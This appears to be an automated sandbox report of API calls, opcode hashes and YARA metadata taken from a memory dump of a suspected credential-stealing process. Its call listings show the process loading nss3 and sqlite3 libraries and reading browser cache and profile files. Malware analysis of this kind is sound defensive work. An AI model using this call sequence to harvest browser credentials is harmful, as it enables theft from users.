                                                                                                                                                                          • Part of subcall function 00410A52: memset.MSVCRT ref: 00410A9A
                                                                                                                                                                          • Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410AB1
                                                                                                                                                                          • Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410AB9
                                                                                                                                                                          • Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410B14
                                                                                                                                                                          • Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410B22
                                                                                                                                                                          • Part of subcall function 004086BA: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,00410A06,00000000,?,00000000,?,00000000), ref: 004086D2
                                                                                                                                                                          • Part of subcall function 004086BA: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 004086E6
                                                                                                                                                                          • Part of subcall function 004086BA: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00411ED6), ref: 004086EF
                                                                                                                                                                        • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 00410A10
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcslen$File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4204647287-0
                                                                                                                                                                        • Opcode ID: 48bb59a4ca4dbe6461cecc32442f889d9791df2e0bee5e493ae7e30c1f2a8d06
                                                                                                                                                                        • Instruction ID: e327927a43c347593f183825775ae13c5bf460ea87da421573a566f28fb83fb7
                                                                                                                                                                        • Opcode Fuzzy Hash: 48bb59a4ca4dbe6461cecc32442f889d9791df2e0bee5e493ae7e30c1f2a8d06
                                                                                                                                                                        • Instruction Fuzzy Hash: 7A117076C00218EBCF11EBA5DA419DEB7B9EF44300F10006BE441F3281EA749B84CB95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SetFilePointerEx.KERNELBASE(004057A8,?,?,00000000,00000000,00000000,00405E25,00000000,00000000,?,00000000,004057A8), ref: 004057EE
                                                                                                                                                                          • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$PointerRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3154509469-0
                                                                                                                                                                        • Opcode ID: 64c5ed2aa36d8d537b285b5c1e7aa840f4d64fa0910f6d092a5b593a7cfce923
                                                                                                                                                                        • Instruction ID: 10cf5b1db118189887eacc4ff35e91e25d6bd08443c232d43c4ae27a9a01ea3e
                                                                                                                                                                        • Opcode Fuzzy Hash: 64c5ed2aa36d8d537b285b5c1e7aa840f4d64fa0910f6d092a5b593a7cfce923
                                                                                                                                                                        • Instruction Fuzzy Hash: FBE0C776100100FFE620AF08CC06F2BBBF8EFC4B00F10882EB2C49A0B5C6326812CB25
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 00413E45
                                                                                                                                                                          • Part of subcall function 00413CAE: memset.MSVCRT ref: 00413CCD
                                                                                                                                                                          • Part of subcall function 00413CAE: _itow.MSVCRT ref: 00413CE4
                                                                                                                                                                          • Part of subcall function 00413CAE: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00413CF3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4232544981-0
                                                                                                                                                                        • Opcode ID: 1f1dca71c13544e9ae3cf3bf1a8489d4a1747e82e79b44c055a72dbc52dfabd8
                                                                                                                                                                        • Instruction ID: 5d66eace87880ca3e294b7f0e570a8e3be22b6ae62b10c3d44e19be24f2def2d
                                                                                                                                                                        • Opcode Fuzzy Hash: 1f1dca71c13544e9ae3cf3bf1a8489d4a1747e82e79b44c055a72dbc52dfabd8
                                                                                                                                                                        • Instruction Fuzzy Hash: 89E0B632000249ABDF126F91EC01AAA7F66FF14315F148459FD6C14121D33295B0AF84
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • FreeLibrary.KERNELBASE(?,?,00411BC7,?,?,00403557,?), ref: 00444436
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                                        • Opcode ID: 323128d68ef13db0835413ed71cea84c0f3745e98266a12d00a9647ca1b2ecc2
                                                                                                                                                                        • Instruction ID: 39ddfc5443798b4b2f471bdaff8db486b4a9363c7739a8bb917076c50ef601e7
                                                                                                                                                                        • Opcode Fuzzy Hash: 323128d68ef13db0835413ed71cea84c0f3745e98266a12d00a9647ca1b2ecc2
                                                                                                                                                                        • Instruction Fuzzy Hash: 92E0F6B5900B008F97308F2BE944506FBF8BEE46103108A1F91AAC2A21C3B4A5498F94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00413627: LoadLibraryW.KERNELBASE(psapi.dll,00000000,00413607,00000000,004134F7,00000000,?), ref: 00413632
                                                                                                                                                                          • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00413646
                                                                                                                                                                          • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00413652
                                                                                                                                                                          • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041365E
                                                                                                                                                                          • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041366A
                                                                                                                                                                          • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413676
                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004134F7,00000104,004134F7,00000000,?), ref: 0041361E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
Similarity
• API ID: AddressProc$FileLibraryLoadModuleName
• String ID:
• API String ID: 3821362017-0
• Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
• Instruction ID: 7bbd5afd8370dadb00360ee8d7667c1b04e34d2617d736b2e99a938255987c13
• Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
• Instruction Fuzzy Hash: 7CD022312043007BD231EE708C00FCBB3E8BF44711F028C1AB190E2280C3B8C9409308
Uniqueness
Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNELBASE(00000000,00406DBF,?,00000000,?,?,?,?,?,00000000,?), ref: 00413408
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: c7bdee4124c4d8ad6a19752b3b65f2382f4191ba04176db7896d06b676d0d792
• Instruction ID: 53121aa1ed69e67302caa1b874726051d72530908054280e128cb363a29a4499
• Opcode Fuzzy Hash: c7bdee4124c4d8ad6a19752b3b65f2382f4191ba04176db7896d06b676d0d792
• Instruction Fuzzy Hash: 51D0C9324005229BDB00AF26EC45B857368EF00351B150025E800BB492D738BEA28ADC
Uniqueness
Uniqueness Score: -1.00%

APIs
• WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0040DDA6,00000000,0044AF64,00000002,?,0040FF40,00000000,00000000,?), ref: 004089B3
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: d35f175962138f83e7c21fa835ff5d24f1ea1e816d258fa8209e89adc734a4dd
• Instruction ID: 44b36b217b32540387e14a2368d622af177610148a3238ec1afc6282a592e5c5
• Opcode Fuzzy Hash: d35f175962138f83e7c21fa835ff5d24f1ea1e816d258fa8209e89adc734a4dd
• Instruction Fuzzy Hash: 64D0C93551020DFFDF01CF80DD06FDE7B7DEB04359F104054BA0495060C7B59A10AB54
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 8208bc6edc164ae96c82fd775a2941fa10469c8b98cafac607abb3fbe20ee729
• Instruction ID: 729bcb02508df23f9412a42fb8e8b3188fed1bd1f0cd2b7b0f8edc4fa6246a8f
• Opcode Fuzzy Hash: 8208bc6edc164ae96c82fd775a2941fa10469c8b98cafac607abb3fbe20ee729
• Instruction Fuzzy Hash: E3C092B4240201BEFF228B10ED15F36295CD740700F2044247E00E80E0D1A04E108924
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040DD67,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000), ref: 00407DA6
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: e4fb0def6ce664a06b79152cf56c2ddeab2622e766aaf14104048769dc5d2c9c
• Instruction ID: edb615435fe3ce855b8554d9524e6f242ae4b45eb81851bd3d2393cb7dc29c83
• Opcode Fuzzy Hash: e4fb0def6ce664a06b79152cf56c2ddeab2622e766aaf14104048769dc5d2c9c
• Instruction Fuzzy Hash: 67C012F43503017FFF208B10AD0AF37395DD780700F1084207F00E80E1D2E14C008924
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: f17d17a82e7eff4c361624d86b7f249207a7f80e03ad9ec9b6aa2e80ce8aa672
• Instruction ID: 664dc763c5da3aaab367392b47211da9bee634dc4adcd4213ebe75a48c3d30fa
• Opcode Fuzzy Hash: f17d17a82e7eff4c361624d86b7f249207a7f80e03ad9ec9b6aa2e80ce8aa672
• Instruction Fuzzy Hash: 6EC09BB29127015BF7309F66C40471373D85F50767F314C5DA4D1964C1DB7CD5408514
Uniqueness
Uniqueness Score: -1.00%

APIs
• EnumResourceNamesW.KERNELBASE(?,?,004141E0,00000000), ref: 00414275
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: EnumNamesResource
• String ID:
• API String ID: 3334572018-0
• Opcode ID: 10e677fbce6fd90f0b0892a272ce9856b781f2edb2e34da2307d6f8996e91fc3
• Instruction ID: 894f21907dab3ca3b917dc931ff3d8bd940b81db11264512214ff9c0d0df685d
• Opcode Fuzzy Hash: 10e677fbce6fd90f0b0892a272ce9856b781f2edb2e34da2307d6f8996e91fc3
• Instruction Fuzzy Hash: 23C09B35654341A7C7029F109C0DF1E7EA5BB95705F504C29B151940A0C75251549609
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindClose.KERNELBASE(?,0040933E,?,00000000,?,004127ED,*.*,?), ref: 00409432
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
• Opcode ID: 0ad1f9dc815212ba49355cece8123c874f6c433bcb3a33917fc8ecdda60dda50
• Instruction ID: 3bd61d94ea2d0ebbf22c21a92135ad1df5e9ea430364887b997a0a3dbe6c7a02
• Opcode Fuzzy Hash: 0ad1f9dc815212ba49355cece8123c874f6c433bcb3a33917fc8ecdda60dda50
• Instruction Fuzzy Hash: 3EC048345109018BD6289F38986A52A77A0AA5A3303A44F6CA0F2920E2E73888428A04
Uniqueness
Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNELBASE(?,0040ADDC), ref: 00413AD7
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: ae408aea655b612f84878290bbe666c5974634203696d3986710f65fc614f927
• Instruction ID: 95e4874612f61a4c2f5820174f699a9a2e50adc9900ffd5901b80c85968e45e3
• Opcode Fuzzy Hash: ae408aea655b612f84878290bbe666c5974634203696d3986710f65fc614f927
• Instruction Fuzzy Hash: 7BC04C35510B118BEF218B12C989793B3E4AF00757F40C818949685851D77CE454CE18
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFileAttributesW.KERNELBASE(?,0040BC93,?,0040BD4A,00000000,?,00000000,00000208,?), ref: 00408254
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 4382bcffcdb6742439dfbf3a6db9824b907b5495e43b5b320ff748ce3f5f7401
• Instruction ID: 7aa4b53cbdd50d27f0544b0d73f3b09e9b9e978b4a3a64aa4ec168f40bbc8e5c
• Opcode Fuzzy Hash: 4382bcffcdb6742439dfbf3a6db9824b907b5495e43b5b320ff748ce3f5f7401
• Instruction Fuzzy Hash: 89B012B92104005BCF0807349C4904D36505F456317300B3CB033C01F0D730CCA0BA00
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004145EB,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00413E62
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        • Opcode ID: beaa972787324bac86b0054d7d1e8ed04957e390a170dd16c4c1fd7d277969b5
                                                                                                                                                                        • Instruction ID: 06f107d5783c69a41ddb44c60f44fa238db6365feab173ebf779541cd7ebc08f
                                                                                                                                                                        • Opcode Fuzzy Hash: beaa972787324bac86b0054d7d1e8ed04957e390a170dd16c4c1fd7d277969b5
                                                                                                                                                                        • Instruction Fuzzy Hash: E1C09B39544301BFDF114F40FE05F09BB61AB84F05F004414B344240B282714414EB57
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: bc414d29a86c02bfab00fdf6615c28341d3535a26ade503b01f52aea8873ca66
                                                                                                                                                                        • Instruction ID: fa567e0f167378dcabf243c4c44df542d601d1aca3ea04bf4c0b19c361688719
                                                                                                                                                                        • Opcode Fuzzy Hash: bc414d29a86c02bfab00fdf6615c28341d3535a26ade503b01f52aea8873ca66
                                                                                                                                                                        • Instruction Fuzzy Hash: 1A317C31901216EFDF14AF25D9817DA73A4FF00B55F14412BF825AB280DB38EDA08BD9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
                                                                                                                                                                          • Part of subcall function 004057D2: SetFilePointerEx.KERNELBASE(004057A8,?,?,00000000,00000000,00000000,00405E25,00000000,00000000,?,00000000,004057A8), ref: 004057EE
                                                                                                                                                                        • memcpy.MSVCRT ref: 00405E6E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@FilePointermemcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 609303285-0
                                                                                                                                                                        • Opcode ID: 69c5ce9f8364cb3a2f3d9952414f58f868eb9a31ba510d0c6d062cd66918fe31
                                                                                                                                                                        • Instruction ID: b6d0ac0748dce8c6543b82d29fb895a5afc24863716f8b43ab814fbacadff293
                                                                                                                                                                        • Opcode Fuzzy Hash: 69c5ce9f8364cb3a2f3d9952414f58f868eb9a31ba510d0c6d062cd66918fe31
                                                                                                                                                                        • Instruction Fuzzy Hash: 2F11B272500908BBD711A755C844F9F77ACEF84318F15807BF94573182C738AE068BE9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2081463915-0
                                                                                                                                                                        • Opcode ID: 5d18b3e2f7875cbfa1b7883ec22a938669b6fc3c83f0355837b3f79f1fd7a5de
                                                                                                                                                                        • Instruction ID: 08e2259bb844cdb7583518af71a3b249da553f2a004d57c4b783ea4beab812a3
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d18b3e2f7875cbfa1b7883ec22a938669b6fc3c83f0355837b3f79f1fd7a5de
                                                                                                                                                                        • Instruction Fuzzy Hash: 3B118871600605AFDB10DF65C8C199AB7F8FF04314F11853EE416E7281EB34F9158B68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004057C0: CloseHandle.KERNEL32(000000FF,00405750,00000000,?,00409A41,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,00409F26,?,0040A0FE,000000FF), ref: 004057C8
                                                                                                                                                                          • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00409A41,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,00409F26,?,0040A0FE,000000FF,00000000,00000104), ref: 004057AD
                                                                                                                                                                          • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2136311172-0
                                                                                                                                                                        • Opcode ID: 81d98ab7555efe12e5c8b48e24a2d6677c0216f0edfc1775a14d27b6400d9af5
                                                                                                                                                                        • Instruction ID: 00704370d8ec878584a64fe5f9f18aab24b7d249e6cd1ef38c395e5c556ec921
                                                                                                                                                                        • Opcode Fuzzy Hash: 81d98ab7555efe12e5c8b48e24a2d6677c0216f0edfc1775a14d27b6400d9af5
                                                                                                                                                                        • Instruction Fuzzy Hash: 190181B5415A00DFE7205B30C905BA776E8EF51315F10893FE595E72C1EB7C9480DAAE
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00409552: ??3@YAXPAX@Z.MSVCRT ref: 00409559
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00409542
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@??3@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1936579350-0
                                                                                                                                                                        • Opcode ID: afed82952d0e9bcea28b6882f33bad89db067c3a9bda0bf3c4f02441038791aa
                                                                                                                                                                        • Instruction ID: 8918756149df837d9eea435be632a3e0a17df07a668273fb2c59ff5331204d46
                                                                                                                                                                        • Opcode Fuzzy Hash: afed82952d0e9bcea28b6882f33bad89db067c3a9bda0bf3c4f02441038791aa
                                                                                                                                                                        • Instruction Fuzzy Hash: 2BC08C724182100AD650FF79280205622D49E82320301882FE091E3142D53848014344
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                        • Opcode ID: ca48b363025fd7f42afa8552a353c3ae8abba493304229bf9adae34e8f70245b
                                                                                                                                                                        • Instruction ID: def78aeb235da03500d5bf48ca01037dd20a397eb60980b6de46ef9d9da7be76
                                                                                                                                                                        • Opcode Fuzzy Hash: ca48b363025fd7f42afa8552a353c3ae8abba493304229bf9adae34e8f70245b
                                                                                                                                                                        • Instruction Fuzzy Hash: ACC01272420B018FF7209E11C406722B3E4EF0077BF618C0D909481482C77CD4408A48
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • free.MSVCRT(00000000,004092A3,00000000,?,00000000), ref: 00408F25
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                        • Opcode ID: 3eb1e8d1b89ea51a5407810e4ab9f4a69700e84ea5e736543a1eb2ef7f6bf350
                                                                                                                                                                        • Instruction ID: eebb639015016b4d35185c1cf15d7584ef51e0a9315dec3cbabf5363aa789e86
                                                                                                                                                                        • Opcode Fuzzy Hash: 3eb1e8d1b89ea51a5407810e4ab9f4a69700e84ea5e736543a1eb2ef7f6bf350
• Instruction Fuzzy Hash: C5C0127A4107028BF7308F21C509322B2E5AF0072BF708C0D90D081482CB7CD0808A08
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: e750de9405b69b73a16e34a7c973d61e0a85f8dff2a96d7ff9c71a90812ce4fe
• Instruction ID: c34dd2395d73de7fd8324248a47ac8fcc6ed20e97332430ae650d69d176587ff
• Opcode Fuzzy Hash: e750de9405b69b73a16e34a7c973d61e0a85f8dff2a96d7ff9c71a90812ce4fe
• Instruction Fuzzy Hash: C8900286455511116C0425756C0760911480892176335074A7032959D1CE1C8150601C
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00443A8C
• wcscpy.MSVCRT ref: 00443AA3
• memset.MSVCRT ref: 00443AD6
• wcscpy.MSVCRT ref: 00443AEC
• wcscat.MSVCRT ref: 00443AFD
• wcscpy.MSVCRT ref: 00443B23
• wcscat.MSVCRT ref: 00443B34
• wcscpy.MSVCRT ref: 00443B5B
• wcscat.MSVCRT ref: 00443B6C
• GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B7B
• LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B92
• LoadLibraryW.KERNEL32(sqlite3.dll,?,00000000,00000000), ref: 00443BA5
• LoadLibraryW.KERNEL32(mozsqlite3.dll,?,00000000,00000000), ref: 00443BB3
• LoadLibraryW.KERNEL32(nss3.dll,?,00000000,00000000), ref: 00443BC3
• GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00443BDF
• GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00443BEB
• GetProcAddress.KERNEL32(?,sqlite3_step), ref: 00443BF8
• GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 00443C05
• GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 00443C12
• GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 00443C1F
• GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 00443C2C
• GetProcAddress.KERNEL32(?,sqlite3_close), ref: 00443C39
• GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 00443C46
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
